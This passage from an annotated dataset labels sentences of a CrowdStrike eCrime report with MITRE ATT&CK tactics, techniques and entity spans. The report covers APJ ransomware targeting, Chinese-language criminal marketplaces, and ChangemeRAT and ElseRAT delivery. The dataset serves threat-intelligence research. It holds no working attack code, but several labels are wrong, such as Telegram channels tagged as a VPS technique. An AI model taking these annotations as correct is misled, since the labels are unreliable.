intent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s19-40522f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 19, "context_before": "These adversaries’ regional victim proportions are similar to the overall APJ-based big game hunting (BGH) victim proportions, indicating the adversaries likely targeted relevant APJ-based entities opportunistically rather than with overall strategic intent.", "sentence_text": "These adversaries (except BITWISE SPIDER) did not list Chinese entities on their DLSs, even though China is both the world’s second largest economy and second most populous country.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s20-b6dd0c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 20, "context_before": "These adversaries (except BITWISE SPIDER) did not list Chinese entities on their DLSs, even though China is both the world’s second largest economy and second most populous country.", "sentence_text": "BGH adversaries prohibiting certain target areas is not uncommon, but such prohibitions are typically confined to CIS nations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s21-4d02bc", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 21, "context_before": "BGH adversaries prohibiting certain target areas is not uncommon, but such prohibitions are typically confined to CIS nations.", "sentence_text": "KillSec COUNT\nTARGETS: 63\nFunkLocker COUNT\nTARGETS: 59\nHunters International COUNT TARGETS: 35 Qilin COUNT TARGETS: 34 TARGET COUNTRIES:\nAFGHANISTAN MONGOLIA\nAUSTRALIA MYANMAR\nBANGLADESH NEPAL\nCAMBODIA NEW ZEALAND CHINA PAKISTAN FIJI PALAU HONG KONG SINGAPORE INDIA SOUTH KOREA", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s22-f5763c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 22, "context_before": "KillSec COUNT\nTARGETS: 63\nFunkLocker COUNT\nTARGETS: 59\nHunters International COUNT TARGETS: 35 Qilin COUNT TARGETS: 34 TARGET COUNTRIES:\nAFGHANISTAN MONGOLIA\nAUSTRALIA MYANMAR\nBANGLADESH NEPAL\nCAMBODIA NEW ZEALAND CHINA PAKISTAN FIJI PALAU HONG KONG SINGAPORE INDIA SOUTH KOREA", "sentence_text": "Of these victims, most were based in India (21% for FunkLocker and 33% for KillSec).", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "FunkLocker and KillSec show a high concentration of victims in India, indicating focused regional targeting", "entities": [ { "text": "FunkLocker ", "start": 52, "end": 63, "label": "ThreatActor" }, { "text": "KillSec", "start": 75, "end": 82, "label": "ThreatActor" }, { "text": "India ", "start": 37, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "victims", "start": 9, "end": 16, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s23-923d7b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 23, "context_before": "Of these victims, most were based in India (21% for FunkLocker and 33% for KillSec).", "sentence_text": "The group’s leader, Scorpion, has historically also engaged in hacktivism.2 2 https://foresiet.com/blog/funksec-ransomware-architect-exclusive-interview/", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "Scorpion has previously participated in hacktivist activity, indicating a history of ideologically motivated cyber operations", "entities": [ { "text": "The group’s leader", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "Scorpion", "start": 20, "end": 28, "label": "ThreatActor" }, { "text": " engaged in hacktivism", "start": 51, "end": 73, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s24-dc5986", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 24, "context_before": "The group’s leader, Scorpion, has historically also engaged in hacktivism.2 2 https://foresiet.com/blog/funksec-ransomware-architect-exclusive-interview/", "sentence_text": "Underground Ecosystem\nDespite the Chinese government’s internet restrictions and eCrime crackdown, clearnet and darknet marketplaces remain prominent in the Chinese-language underground ecosystem.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Chinese-language clearnet and darknet marketplaces continue operating despite government restrictions, indicating resilience within the underground eCrime ecosystem", "entities": [ { "text": "crackdown", "start": 88, "end": 97, "label": "Action" }, { "text": "remain prominent ", "start": 133, "end": 150, "label": "Action" }, { "text": "clearnet and darknet marketplaces", "start": 99, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "Chinese-language underground ecosystem", "start": 157, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "internet restrictions ", "start": 55, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s25-341941", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 25, "context_before": "Underground Ecosystem\nDespite the Chinese government’s internet restrictions and eCrime crackdown, clearnet and darknet marketplaces remain prominent in the Chinese-language underground ecosystem.", "sentence_text": "eCrime actors also maintain numerous Telegram channels on which they advertise and solicit criminal services.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "eCrime actors use Telegram channels to promote and request various criminal services within the underground ecosystem", "entities": [ { "text": "eCrime actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "maintain ", "start": 19, "end": 28, "label": "Action" }, { "text": "advertise ", "start": 69, "end": 79, "label": "Action" }, { "text": "solicit ", "start": 83, "end": 91, "label": "Action" }, { "text": "Telegram channels", "start": 37, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "criminal services", "start": 91, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s26-3e6cb8", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 26, "context_before": "eCrime actors also maintain numerous Telegram channels on which they advertise and solicit criminal services.", "sentence_text": "Likely in response to government control, Chinese-speaking eCrime actors have adopted unique tactics prioritizing operations security (OPSEC) and default anonymity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Chinese-speaking eCrime actors employ OPSEC-focused and anonymity-by-default tactics to evade government oversight", "entities": [ { "text": "Chinese-speaking eCrime actors", "start": 42, "end": 72, "label": "ThreatActor" }, { "text": "adopted unique tactics", "start": 78, "end": 100, "label": "Action" }, { "text": "operations security (OPSEC)", "start": 114, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "prioritizing ", "start": 101, "end": 114, "label": "Action" }, { "text": "default anonymity.", "start": 146, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s27-bd5836", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 27, "context_before": "Likely in response to government control, Chinese-speaking eCrime actors have adopted unique tactics prioritizing operations security (OPSEC) and default anonymity.", "sentence_text": "CHANG’AN MARKETPLACE\nProminent Chinese-language criminal marketplace Chang’an (aka Chang’an Sleepless City or has been active since 2022.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "The Chang’an marketplace has operated as a major Chinese-language criminal platform since 2022", "entities": [ { "text": "marketplace ", "start": 57, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "Chang’an Sleepless City ", "start": 83, "end": 107, "label": "Infrastructure_Indicator" }, { "text": " Chinese-language criminal", "start": 30, "end": 56, "label": "Infrastructure_Indicator" }, { "text": " has been active", "start": 109, "end": 125, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s28-7f1d3a", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 28, "context_before": "CHANG’AN MARKETPLACE\nProminent Chinese-language criminal marketplace Chang’an (aka Chang’an Sleepless City or has been active since 2022.", "sentence_text": "Telegram marketplace with more than 7,000 current members.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "The Telegram-based criminal marketplace hosts over 7,000 active members, indicating significant underground activity and reach", "entities": [ { "text": "Telegram marketplace", "start": 0, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "members", "start": 50, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s29-dfd8ef", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 29, "context_before": "Telegram marketplace with more than 7,000 current members.", "sentence_text": "Though most discussions occur on Telegram, Chang’an encourages members to conduct transactions using the marketplace’s escrow service.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "The marketplace hosts discussions on Telegram but directs members to use its escrow service for conducting transactions, indicating structured criminal operations", "entities": [ { "text": "Chang’an ", "start": 43, "end": 52, "label": "ThreatActor" }, { "text": "Telegram", "start": 33, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "marketplace’s escrow service", "start": 105, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s30-d5616b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 30, "context_before": "Though most discussions occur on Telegram, Chang’an encourages members to conduct transactions using the marketplace’s escrow service.", "sentence_text": "Likely due to the Chinese government’s crackdown on eCrime, Chang’an emphasizes anonymity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s31-5dab1f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 31, "context_before": "Likely due to the Chinese government’s crackdown on eCrime, Chang’an emphasizes anonymity.", "sentence_text": "Sellers’ usernames are obfuscated by default in listings, which display only the first and last letters of each username.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Sellers hide their identities by obfuscating usernames, showing only the first and last letters, to maintain anonymity", "entities": [ { "text": "Sellers", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "usernames are obfuscated", "start": 9, "end": 33, "label": "Action" }, { "text": "display only the first and last letters", "start": 64, "end": 103, "label": "Action" }, { "text": "listings", "start": 48, "end": 56, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p6-s32-c2963b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 6, "sentence_id": 32, "context_before": "Sellers’ usernames are obfuscated by default in listings, which display only the first and last letters of each username.", "sentence_text": "Similarly, the marketplace prohibits sellers from providing contact information in their listings.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The marketplace enforces OPSEC by forbidding sellers from adding any contact information to their listings", "entities": [ { "text": "sellers ", "start": 37, "end": 45, "label": "ThreatActor" }, { "text": "providing contact information", "start": 50, "end": 79, "label": "Action" }, { "text": "listings", "start": 89, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p8-s35-485764", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 8, "sentence_id": 35, "context_before": "Only (QP/CP 专属)3 • Service Orders (服务接单)\n• Virtual Resources (虚拟资源)\nSimilar to other Chinese-language eCrime marketplaces, FreeCity also has several associated Telegram channels that include the following:\n• Chinese Community Channel (中文社区)\n• Darkweb Tutorial Channel this channel primarily explains how to use Tor and VPNs to bypass (暗网教程;\nthe Great Firewall)\n• Fraudsters Exposure Channel (骗子曝光\")\n• Notice Channel (公告频道)\n3 Chinese-speaking eCrime actors commonly use “QP/CP” as slang for sports gambling and lottery activities", "sentence_text": "Money laundering and pig butchering scams continue to be prevalent across Southeast Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p8-s36-e224ef", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 8, "sentence_id": 36, "context_before": "Money laundering and pig butchering scams continue to be prevalent across Southeast Asia.", "sentence_text": "Huione Guarantee established a reputation for transparency and trustworthiness among eCrime actors and facilitated an estimated 27 billion USD worth of transactions, primarily in Tether, over its lifespan.5 On May 1, 2025, the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) issued a ruling naming Huione Group a financial institution of primary money laundering concern and moved to block its access to the U.S. financial system.6 Around the same time, the service changed its name to Haowang Guarantee, but the new name was short-lived, as Telegram began shutting down the service’s channels and banning administrators’ accounts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Criminal service Huione Guarantee (later Haowang Guarantee) facilitated large-scale illicit transactions in Tether and attempted to evade enforcement by renaming before Telegram shut down its channels.", "entities": [ { "text": "Huione Guarantee", "start": 0, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "eCrime actors", "start": 85, "end": 98, "label": "ThreatActor" }, { "text": "27 billion USD worth of transactions", "start": 128, "end": 164, "label": "Action" }, { "text": "Tether", "start": 179, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "Telegram ", "start": 574, "end": 583, "label": "Infrastructure_Indicator" }, { "text": "administrators’ accounts.", "start": 638, "end": 663, "label": "Infrastructure_Indicator" }, { "text": "service’s channels", "start": 607, "end": 625, "label": "Infrastructure_Indicator" }, { "text": "facilitated ", "start": 103, "end": 115, "label": "Action" }, { "text": "banning ", "start": 630, "end": 638, "label": "Action" }, { "text": "moved to block", "start": 407, "end": 421, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p8-s37-072d9c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 8, "sentence_id": 37, "context_before": "Huione Guarantee established a reputation for transparency and trustworthiness among eCrime actors and facilitated an estimated 27 billion USD worth of transactions, primarily in Tether, over its lifespan.5 On May 1, 2025, the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) issued a ruling naming Huione Group a financial institution of primary money laundering concern and moved to block its access to the U.S. financial system.6 Around the same time, the service changed its name to Haowang Guarantee, but the new name was short-lived, as Telegram began shutting down the service’s channels and banning administrators’ accounts.", "sentence_text": "By mid-May 2025, Huione/Haowang Guarantee’s Public Group services were discontinued.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p8-s38-8f325c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 8, "sentence_id": 38, "context_before": "By mid-May 2025, Huione/Haowang Guarantee’s Public Group services were discontinued.", "sentence_text": "The group transferred remaining cryptocurrency assets to the eCrime marketplace Tudou Guarantee for customer settlements.7 Telegram users associated with Huione/Haowang Guarantee have claimed that the Dedicated Group remains operational, but 4 https://www.elliptic.co/blog/cyber-scam-marketplace 5 https://www.elliptic.co/blog/elliptic-data-telegram-market-takedown 6 https://www.fincen.gov/news/news-releases/fincen-finds-cambodia-based-huione-group-be-primary-money-laundering-concern 7 https://www.elliptic.co/blog/elliptic-data-telegram-market-takedown", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s39-a97116", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 39, "context_before": "The group transferred remaining cryptocurrency assets to the eCrime marketplace Tudou Guarantee for customer settlements.7 Telegram users associated with Huione/Haowang Guarantee have claimed that the Dedicated Group remains operational, but 4 https://www.elliptic.co/blog/cyber-scam-marketplace 5 https://www.elliptic.co/blog/elliptic-data-telegram-market-takedown 6 https://www.fincen.gov/news/news-releases/fincen-finds-cambodia-based-huione-group-be-primary-money-laundering-concern 7 https://www.elliptic.co/blog/elliptic-data-telegram-market-takedown", "sentence_text": "Apart from SOLAR SPIDER, these adversaries are mainly opportunistic and have not been observed targeting the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s40-a6fc8b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 40, "context_before": "Apart from SOLAR SPIDER, these adversaries are mainly opportunistic and have not been observed targeting the region.", "sentence_text": "eCrime adversaries (especially in Eastern Europe)\nsometimes prohibit targeting of their own region due to nationalistic loyalties or to avoid legal repercussions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s41-4b9318", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 41, "context_before": "eCrime adversaries (especially in Eastern Europe)\nsometimes prohibit targeting of their own region due to nationalistic loyalties or to avoid legal repercussions.", "sentence_text": "Though CrowdStrike Intelligence has not observed APJ eCrime actors explicitly prohibiting regional targeting, Chinese- speaking marketplaces’ rules and emphasis on anonymity indicate they hope to avoid law enforcement attention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s42-f9be12", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 42, "context_before": "Though CrowdStrike Intelligence has not observed APJ eCrime actors explicitly prohibiting regional targeting, Chinese- speaking marketplaces’ rules and emphasis on anonymity indicate they hope to avoid law enforcement attention.", "sentence_text": "CHARIOT RADIANT SINFUL SOLAR SPIDER SPIDER SPIDER SPIDER ORIGIN:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s43-4d7576", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 43, "context_before": "CHARIOT RADIANT SINFUL SOLAR SPIDER SPIDER SPIDER SPIDER ORIGIN:", "sentence_text": "VIETNAM ORIGIN:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s44-164fb5", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 44, "context_before": "VIETNAM ORIGIN:", "sentence_text": "CHINA ORIGIN: CHINA ORIGIN: SOUTH ASIA Vietnam-based eCrime adversary that eCrime adversary focused on delivering Likely China-based eCrime adversary that eCrime actor that consistently targets has compromised Microsoft IIS and the SilentSkimmer formjacking script to conducts opportunistic campaigns relying banks and foreign exchange services Adobe ColdFusion web servers since harvest payment card data; based on their on password spraying and exploiting in the Middle East, South Asia, and 2019; CHARIOT SPIDER monetizes use of tooling and infrastructure typical of known vulnerabilities in internet-facing Southeast Asia; SOLAR SPIDER relies on access by deploying PixelSkimmer Chinese-speaking actors, RADIANT applications; SINFUL SPIDER commonly finance-themed phishing to deliver the formjacking scripts to capture SPIDER likely speaks Chinese.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s45-b92944", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 45, "context_before": "CHINA ORIGIN: CHINA ORIGIN: SOUTH ASIA Vietnam-based eCrime adversary that eCrime adversary focused on delivering Likely China-based eCrime adversary that eCrime actor that consistently targets has compromised Microsoft IIS and the SilentSkimmer formjacking script to conducts opportunistic campaigns relying banks and foreign exchange services Adobe ColdFusion web servers since harvest payment card data; based on their on password spraying and exploiting in the Middle East, South Asia, and 2019; CHARIOT SPIDER monetizes use of tooling and infrastructure typical of known vulnerabilities in internet-facing Southeast Asia; SOLAR SPIDER relies on access by deploying PixelSkimmer Chinese-speaking actors, RADIANT applications; SINFUL SPIDER commonly finance-themed phishing to deliver the formjacking scripts to capture SPIDER likely speaks Chinese.", "sentence_text": "redirects compromised webpages to JsOutProx RAT, commodity malware, payment card information.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Redirect compromised webpages to deliver malware and obtain payment card information.", "entities": [ { "text": "redirects compromised webpages", "start": 0, "end": 30, "label": "Action" }, { "text": "JsOutProx RAT", "start": 34, "end": 47, "label": "MalwareTool" }, { "text": "commodity malware", "start": 49, "end": 66, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s46-a238fc", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 46, "context_before": "redirects compromised webpages to JsOutProx RAT, commodity malware, payment card information.", "sentence_text": "gambling sites.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p9-s47-6cb6ae", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 9, "sentence_id": 47, "context_before": "gambling sites.", "sentence_text": "and custom tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s48-b06777", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 48, "context_before": "and custom tools.", "sentence_text": "CHANGEMERAT\nSince at least October 2024, an unidentified financially motivated threat actor has delivered ChangemeRAT to Chinese-speaking users, consistently delivering payloads via trojanized Microsoft Software Installer (MSI) files hosted on websites likely disseminated via search engine optimization (SEO) poisoning or malvertising.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Deliver ChangemeRAT payloads through trojanized MSI files hosted on websites distributed via SEO poisoning or malvertising.", "entities": [ { "text": "threat actor", "start": 79, "end": 91, "label": "ThreatActor" }, { "text": "delivered ChangemeRAT to Chinese-speaking users, consistently delivering payloads via trojanized Microsoft Software Installer (MSI) files hosted on websites likely disseminated via search engine optimization (SEO) poisoning or malvertising", "start": 96, "end": 335, "label": "Action" }, { "text": "ChangemeRAT", "start": 106, "end": 117, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s49-2bb3a5", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 49, "context_before": "CHANGEMERAT\nSince at least October 2024, an unidentified financially motivated threat actor has delivered ChangemeRAT to Chinese-speaking users, consistently delivering payloads via trojanized Microsoft Software Installer (MSI) files hosted on websites likely disseminated via search engine optimization (SEO) poisoning or malvertising.", "sentence_text": "In March 2025, CrowdStrike Intelligence identified a ChangemeRAT campaign impacting Chinese-speaking users in which payloads masqueraded as legitimate Chinese-language applications, including Youdao Dictionary and SiGua Instant Messaging.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Masquerade payloads as legitimate Chinese-language applications to target Chinese-speaking users.", "entities": [ { "text": "ChangemeRAT", "start": 53, "end": 64, "label": "MalwareTool" }, { "text": "payloads masqueraded as legitimate Chinese-language applications, including Youdao Dictionary and SiGua Instant Messaging", "start": 116, "end": 237, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s50-46fdc1", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 50, "context_before": "In March 2025, CrowdStrike Intelligence identified a ChangemeRAT campaign impacting Chinese-speaking users in which payloads masqueraded as legitimate Chinese-language applications, including Youdao Dictionary and SiGua Instant Messaging.", "sentence_text": "The campaign leveraged multiple legitimate MSI binaries that sideload various malicious loader dynamic link libraries (DLLs) containing legitimate but invalid signatures.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "The campaign used legitimate MSI binaries to sideload malicious DLLs with invalid signatures.", "entities": [ { "text": "leveraged multiple legitimate MSI binaries that sideload various malicious loader dynamic link libraries (DLLs)", "start": 13, "end": 124, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s51-86b569", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 51, "context_before": "The campaign leveraged multiple legitimate MSI binaries that sideload various malicious loader dynamic link libraries (DLLs) containing legitimate but invalid signatures.", "sentence_text": "The invalid signatures suggest the threat actor likely modified legitimate DLLs to contain code that ultimately deploys the ChangemeRAT samples.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "The threat actor modified legitimate DLLs to include malicious code that deploys ChangemeRAT.", "entities": [ { "text": "the threat actor", "start": 31, "end": 47, "label": "ThreatActor" }, { "text": "modified legitimate DLLs to contain code that ultimately deploys the ChangemeRAT samples", "start": 55, "end": 143, "label": "Action" }, { "text": "ChangemeRAT", "start": 124, "end": 135, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s52-404afb", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 52, "context_before": "The invalid signatures suggest the threat actor likely modified legitimate DLLs to contain code that ultimately deploys the ChangemeRAT samples.", "sentence_text": "The DLL implements specific anti-analysis features, including checking for ZhuDongFangYu.exe, a process associated with the China-based security product 360 Total Security.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "The malware DLL evades analysis by checking whether the ZhuDongFangYu.exe process—part of the 360 Total Security antivirus—is running.", "entities": [ { "text": "implements ", "start": 8, "end": 19, "label": "Action" }, { "text": "checking ", "start": 62, "end": 71, "label": "Action" }, { "text": "The DLL", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "anti-analysis features", "start": 28, "end": 50, "label": "MalwareTool" }, { "text": "ZhuDongFangYu.exe", "start": 75, "end": 92, "label": "MalwareTool" }, { "text": "360 Total Security", "start": 153, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "China-based", "start": 124, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "associated ", "start": 104, "end": 115, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s53-c372df", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 53, "context_before": "The DLL implements specific anti-analysis features, including checking for ZhuDongFangYu.exe, a process associated with the China-based security product 360 Total Security.", "sentence_text": "This specific check suggests the DLL developer hopes to evade security products commonly used by Chinese speakers.\nsuggesting the threat actor likely targeted Chinese speakers across geographies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s54-b2b100", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 54, "context_before": "This specific check suggests the DLL developer hopes to evade security products commonly used by Chinese speakers.\nsuggesting the threat actor likely targeted Chinese speakers across geographies.", "sentence_text": "ELSERAT\nSince at least January 2025, a Chinese-speaking eCrime actor has targeted users in China and Japan using ElseRAT, directing users to Chinese- and Japanese-language phishing pages that encourage them to download .docx files masquerading as purchase orders.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "The threat actor directed users to phishing pages to download .docx files disguised as purchase orders using ElseRAT.", "entities": [ { "text": "a Chinese-speaking eCrime actor", "start": 37, "end": 68, "label": "ThreatActor" }, { "text": "ElseRAT", "start": 113, "end": 120, "label": "MalwareTool" }, { "text": "directing users to Chinese- and Japanese-language phishing pages that encourage them to download .docx files masquerading as purchase orders", "start": 122, "end": 262, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s55-528cbe", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 55, "context_before": "ELSERAT\nSince at least January 2025, a Chinese-speaking eCrime actor has targeted users in China and Japan using ElseRAT, directing users to Chinese- and Japanese-language phishing pages that encourage them to download .docx files masquerading as purchase orders.", "sentence_text": "Each .docx file, typically named document.docx, contains English-language instructions and a ZIP archive named document.zip embedded as an Object Linking and Embedding (OLE) object that the user must extract.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s56-4a8da5", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 56, "context_before": "Each .docx file, typically named document.docx, contains English-language instructions and a ZIP archive named document.zip embedded as an Object Linking and Embedding (OLE) object that the user must extract.", "sentence_text": "The ZIP archive contains a binary named document.exe that ultimately drops an ElseRAT sample (Figure 6).\nEXTRACTS AND EXTRACTS AND LOADS AND LOADS AND DROPS ZIP EXECUTES EXECUTES EXECUTES EXECUTES Lure Document ZIP File ElseRAT Dropper ElseRAT EPL Loader EPL Kernel Library Compiled EPL Loader document.exe svchost.exe kmln.fnr 